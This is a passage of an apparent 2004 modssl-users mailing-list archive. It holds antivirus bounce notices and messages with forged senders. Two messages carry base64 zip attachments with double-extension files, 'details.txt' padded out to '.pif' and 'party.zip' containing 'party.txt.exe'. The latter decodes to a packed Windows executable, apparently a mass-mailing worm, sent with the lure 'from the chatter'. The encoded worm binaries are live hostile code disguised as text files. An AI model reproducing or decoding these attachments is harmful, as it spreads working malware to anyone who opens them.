PsfGf/9STGEM5SFpBveLpzSNsv42znXHFgKux8o7Y988wJpP7ALynwERegh1b3VveA4efgyM
wXhFdbVClybCg1abyU9fUUZtmSONnTMYqZnQjCOc6UsSISYAeO0YweBPIPwQp8qvC0A4Iw6q
EAjBiWYcF9/7dSZKfA4sA7ic8vdXZRtjhfqb+/QlSSdeiFtZ638dhZpslnxrrOyWCkQC9zv5
ThE1c+hq9gjgnzjc1aqhTcNgOo4dPSKRHGSEK1bixnOSMwNr2we84tNGyphKUZekD4uOEwYY
0NJ75CnOtudCWdCoGNDFAKx6ySH9tODWM0upDR0qepLdNbId4nRLjwAAAQACACAgEAABAAQA
6AIAAAEAKAAAACAAAABAAAAAAQAEAAAAAACAAgAAAAAAAAAAAAAAAAAAAAAAAMz//wBoV1gA
AAAAAICAgAD///8AwMDAAP8AAAAA//8AvwAAAAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAiIRIiIiIiIiIiIiIiIiIiIiE1VVVVVVVVVVVVVSUiIiIjRERERERERERERERSUiIiI0RE
RERERFVUREVVUlIiIiNEiIiIREmZRESZlFJSIiIjRERERERElURESVRSUiIiI0SIiIiIRElV
VVlUUlIiIiNEREREREREmZmZVFJSIiIjRIiIiIiIRElUSVRSUiIiI0RERERERERElUlUUlIi
IiNEiIiIiIiIRElZVFJSIiIjREREREREREREmVRSUiIiI0SIiIiIiIiIRElEUlIiIiNERERE
RERERERERFJSIiIjRIiIiIiIiIiIiERSUiIiI0REREREREREREREUlIiIiNEiIiIiIiIiIiI
RFJSIiIjRERERERERERERERSUiIiI0QiIiIiRIiIiIhEUlIiIiNEOZJEQkRERERERFJSIiIj
RDIiIiJEiIiIiERSUiIiI0Q0QndyREREREREUlIiIiNEMiJ3ckSIiIiIRFJSIiIjRDRCd3JE
RERERERSUiIiI0Q0QmZiREREREREUlIiIiNENEJmYkRERERERFJSIiIjRDMyIiJERERERERS
UiIiI0REREREREREREREUlIiIiNCRCRCRCRCRCRCRDJSIiIjQkQkQkQkQkQkQkQyUiIiIiQz
QzQzQzQzQzQzQyIiIiIiIiIiIiIiIiIiIiIiIuAAAA/gAAAH4AAAB+AAAAfgAAAH4AAAB+AA
AAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH
4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB/gAAA//////oRzoMEAB
acD9QwPABcM4niYooxADwfgQJf9/hwDDi0QkVQQS6VXs7FEHU1ZXM/8xiX381BUcYCAoi/Bo
yMA3D7dFCFBkViYYIdhTkRUUMlAOECE7x4mKPHQqFhEMDVdogKzAagLxsBIRQP91bAyKNAiI
g/j7v1QBdQQzwOtB0Ns7A/d2GOhh/xwCmbkbAVLx+YuAjDAUA0M73h5y6I3M/FfhdWwIfXgE
ii4JEWd6ObH8D5TYX14pW8myHIGMZAx8VnC+YAQMV42FnG/zoqZQamApFSysDT0oDYgs4PtO
jNcUvEb3AIB9/lyLNSTFPb/gReF0CiIlVwXWIQpo0LAvHYC93IlcoUI8ICH+NeGhORA0YTAJ
amXoMrv+EFmTP70Kg1COyiaRIEGwBq9yRAhq2wUoxEaj5B/IFjyJPbcjLXRTFDTobEV2dSLG
AxU4NXxQUVoSCXVYloUSwHQFVE0TRhUjNBEUdRkPagHnMEgSAvTQkDEwwhAAtDgwQDKQCXQk
EENVJ2yXzo5pz20KYQifdo9lIO9F727vY+9y73nscCtl/GTPJlftbyObTEQN1i/lFhTNMGJK
nwpT2WtZTrMnXC7zQ/NadjOoMXAq/8OFPDVkpy64Uw7KRoGfZ5loFXP5QlSRDoRrGQN1+GVy
9m8AbmZpZzl4LmRxbOEQQklOGEFSWRBGVgNQcm90ZWObLqN4tjFgXAAA4AHgAuAg4hDOEQQN
6Ba+EX2kDnsog0YiAYwoCRCJIBZJiRTAwp8BFYADbwgUB5ACZhPAAtAQCXBV/wO8CFIHQQIG
EwqOQigBdwFscBAon9EECBB5mYP0RPf9JhAihBDi947QAhCckU+9GAjwqwEZ0g+PA4BceMBU
B7ADrQRSAzjqrwAAAeAgcEAOS0VSTmBMMzIuZHFs4EbobwZzZUhhbhjtwFpyPml0OkZuFb6/
KWELHEEdVp96R29mUudzUXVyY582Tzqpaw1iYWQWEElpbrZueko9dE2+ZClsXbMiRvFweUlS
m+R0RkTAJFfBa293c0TfPuRj+ep5pTmgLRROYW1MhlBy8PJk45xMc2p2H0xpYjtTLz5UUJND
z+5uNA0YTGG8RXLcXOvFjE11CHjMTgMAAAAAAAAAAAAAAAAAUEsBAhQACgAAAAAAdyx/MKOI
Hd6AcwAAgHMAAFQAAAAAAAAAAAAgAAAAAAAAAGRldGFpbHMudHh0ICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
LnBpZlBLBQYAAAAAAQABAIIAAADycwAAAAA=

------=_NextPart_000_0016----=_NextPart_000_0016--



From MAILER-DAEMON@polito.it  Wed Mar 31 08:04:23 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from polito.it (anacreon.polito.it [130.192.3.82])
	by master.modssl.org (Postfix) with ESMTP id B0530A8977
	for ; Wed, 31 Mar 2004 08:04:07 +0200 (CEST)
Sender: 
Date: Wed, 31 Mar 2004 08:03:57 +0200
Message-ID: 
X-Autogenerated: React
From: ANTIVIRUS-SYSTEM@polito.it
To: modssl-users-l@master.modssl.org
Subject: Attenzione Virus - Virus Alert 

*********************************************************
                  V I R U S - A L E R T
                    Servizio Antivirus
           (Ce.S.I.T. - Politecnico di Torino)
*********************************************************
  IL PRESENTE MESSAGGIO VIENE INVIATO AUTOMATICAMENTE
   non e' necessario rispondere a tale segnalazione.
*********************************************************

Un messaggio in arrivo e` stato eliminato dai sistemi di protezione
installati sui server di posta elettronica d'Ateneo.

Mittente:  arkobad@centrum.cz  (presumibilmente falsificato)
Oggetto:  Re: Protected Mail Request
---------------------------------------------------------

On Wed, 31 Mar 2004 08:02:55 +0200 
a message which was sent to you was discarded by Antivirus 
Service on our domain server.
 
Sender:   arkobad@centrum.cz  (may be faked)
Subject:  Re: Protected Mail Request

*********************************************************
 Cos'e' un Virus - Non voglio ricevere questo messaggio
                    Qui le risposte
        https://mail.polito.it/Files/antivirus.htm
*********************************************************

From TrendVirusWall23@nuwc.navy.mil  Wed Mar 31 08:04:31 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from npri54mai01.npt.nuwc.navy.mil (NPRI54MAI01.NPT.NUWC.NAVY.MIL [164.223.1.100])
	by master.modssl.org (Postfix) with ESMTP id 5C8E2A898B
	for ; Wed, 31 Mar 2004 08:04:15 +0200 (CEST)
Received: from npri54exc23.npt.nuwc.navy.mil
 (NPRI54EXC23.NPT.NUWC.NAVY.MIL [129.190.70.168])
 by npri54mai01.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id <73RU08PLPZRS8R01MO@npri54mai01.npt.nuwc.navy.mil> for
 modssl-users-l@master.modssl.org; Wed,
 31 Mar 2004 01:04:06 -0500 (Eastern Standard Time)
Received: from NPRI54EXC23.NPT.NUWC.NAVY.MIL ([129.190.70.168])
 by npri54exc23.npt.nuwc.navy.mil with SMTP
 (Microsoft Exchange Internet Mail Service Version 5.5.2657.72)
	id H944JYX1; Wed, 31 Mar 2004 01:04:04 -0500
Date: Wed, 31 Mar 2004 01:03:55 -0500
From: TrendVirusWall23@nuwc.navy.mil
Subject: Content mail warning notification!
To: modssl-users-l@master.modssl.org
Message-id: <73ST08PLQC9O8R01MO@npri54mai01.npt.nuwc.navy.mil>
MIME-version: 1.0
Content-type: multipart/mixed;
 boundary="----=_NextPart_000_1080713035_B78506032.R82506026"
InterScan-Notification: yes

This is a multi-part message in MIME format.

------=_NextPart_000_1080713035_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

************* eManager Notification **************

Due to a restricted file type, Trend Virus Detector [23] has replaced the attachment with e-mail header information.

Source mailbox: "owner-mmx-modssl-users@mmx.engelschall.com"
Destination mailbox(es): "modssl-users-l@master.modssl.org"

******************* End of message *******************

------=_NextPart_000_1080713035_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Received: from 164.223.1.101 by npri54exc23.npt.nuwc.navy.mil (InterScan E-Mail VirusWall NT); Wed, 31 Mar 2004 01:03:55 -0500
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
 by npri54mai02.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id <733X08PKTWJK8R01EG@npri54mai02.npt.nuwc.navy.mil> for
 fariast@npt.nuwc.navy.mil; Wed,
 31 Mar 2004 01:03:50 -0500 (Eastern Standard Time)
Received: by mmx.engelschall.com (Postfix)	id 646531932E; Wed,
 31 Mar 2004 08:02:57 +0200 (CEST)
Received: from master.modssl.org (unknown [195.27.176.156])
	by mmx.engelschall.com (Postfix) with ESMTP id 413EE19321	for
 ; Wed, 31 Mar 2004 08:02:57 +0200 (CEST)
Received: by master.modssl.org (Postfix)	id B8DD2A898B; Wed,
 31 Mar 2004 08:03:00 +0200 (CEST)
Received: from master.modssl.org (teazmail.teaz.cz [212.71.157.203])
	by master.modssl.org (Postfix) with ESMTP id D680AA8946	for
 ; Wed, 31 Mar 2004 08:02:48 +0200 (CEST)
Date: Wed, 31 Mar 2004 08:02:55 +0200
From: arkobad@centrum.cz
Subject: Re: Protected Mail Request
To: modssl-users-l@master.modssl.org
Message-id: <20040331060248.D680AA8946@master.modssl.org>
MIME-version: 1.0
Content-type: multipart/mixed;
 boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-priority: Normal
Delivered-to: modssl-users-l@master.modssl.org

------=_NextPart_000_1080713035_B78506032.R82506026--

From owner-modssl-users@modssl.org  Wed Mar 31 10:51:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68639A898B; Wed, 31 Mar 2004 10:51:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from modssl.org (host94-162.pool8173.interbusiness.it [81.73.162.94])
	by master.modssl.org (Postfix) with SMTP id 22544A8933
	for ; Wed, 31 Mar 2004 10:51:37 +0200 (CEST)
From: rse@engelschall.com
To: modssl-users@modssl.org
Subject: unknown
Date: Wed, 31 Mar 2004 10:52:42 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="14735085"
Message-Id: <20040331085137.22544A8933@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--14735085
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

from the chatter

--14735085
Content-Type: application/x-zip-compressed; name="party.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="party.zip"

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
